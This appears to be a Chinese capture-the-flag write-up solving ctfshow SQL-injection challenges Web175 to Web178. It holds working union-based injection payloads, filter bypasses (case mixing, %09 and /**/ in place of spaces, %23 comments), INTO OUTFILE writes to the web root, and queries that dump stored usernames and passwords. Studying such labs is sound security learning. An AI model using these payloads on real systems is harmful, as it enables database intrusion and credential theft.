Web175
进入界面:
审计:
查询语句:
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑:
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){$ret['msg']='查询成功';}
preg_match函数过滤了所有ASCII码中的符号。
相当于禁止查询任何内容。
思路/EXP:
在linux中,/var/www/html/是网站默认的文件存放位置,我们将查询内容写入文件之后读取。
使用into outfile "[文件路径]"
将数据写入我们创建的文件。
1' order by 2--+ //查出字段数为2-1' union select 1,database() into outfile '/var/www/html/1.txt'--+
//爆库,查看1.txt得到库名-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' into outfile '/var/www/html/2.txt'--+
//爆表,查看2.txt得到表名
//1.txt被创建并写入内容后,不能使用into outfile再向其中写入内容了,所以创建并写入2.txt-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user5' into outfile '/var/www/html/3.txt'--+
//爆字段-1' union select username, password from ctfshow_user5 into outfile '/var/www/html/flag.txt'--+
//爆数据
得到flag.
Web176
进入界面:
审计:
查询语句:
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑:
//对传入的参数进行了过滤function waf($str){//代码过于简单,不宜展示}
思路/EXP:
不再是对查询的内容进行过滤,而是对我们传入的参数进行了过滤。
但是不知道过滤的内容是什么。
先按照联合注入的流程进行查询,在查询的过程再判断过滤了什么:
1' order by 3--+ //字段数为3-1' union select 1,2,3--+
//报错,将union和select分别进行大小写混写,发现是过滤了select
-1' union sElect 1,2,3--+
-1' union sElect 1,2,database()--+
-1' union sElect 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+
-1' union sElect 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+
-1' union sElect 1,2,group_concat(username,password) from ctfshow_user--+
得到flag.
或者输入1’ or 1=1–+,得到数据表全部数据。
Web177
进入界面:
审计:
查询语句:
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑:
//对传入的参数进行了过滤function waf($str){//代码过于简单,不宜展示}
思路:
依旧联合注入,在注入过程中判断被过滤的字符。
发现空格被过滤,将空格替换为/**/
绕过。
注释--+
也被过滤,替换为%23
绕过。
1'/**/order/**/by/**/3%23 //%23是#的URL编码,也是sql语句的注释符号
-1'/**/union/**/select/**/1,2,database()%23 //爆库
-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='ctfshow_web'%23 //爆表
-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='ctfshow_user'%23 //爆字段
-1'/**/union/**/select/**/1,2,group_concat(username,password)/**/from/**/ctfshow_user%23 //爆数据
得到flag.
Web178
进入页面:
审计:
与上一题相同。
思路:
依旧边注入边分析过滤的内容。
依旧是过滤了空格,但是也过滤了/**/
和+
,导致我们不能用这两个符号来绕过空格。
使用脚本,测试所以可以绕过空格的符号:
order = "1' order by 1%23"
#绕过对空格的过滤
#空格替换:%09 %0a %0d %0c /**/ +
spaces = ["%09","%0a","%0d","%0c","/**/","+"]
for space in spaces:string = order.replace(" ",space)print(string)
发现除了/**/
和+
,其他符号都有效。
1'%09order%09by%093%23 //字段数为3
-1'%09union%09select%091,2,database()%23 //爆库名
-1'%09union%09select%091,2,group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='ctfshow_web'%23 //爆表名
-1'%09union%09select%091,2,group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='ctfshow_user'%23 //爆字段
-1'%09union%09select%091,2,group_concat(username,password)%09from%09ctfshow_user%23 //爆数据
得到flag.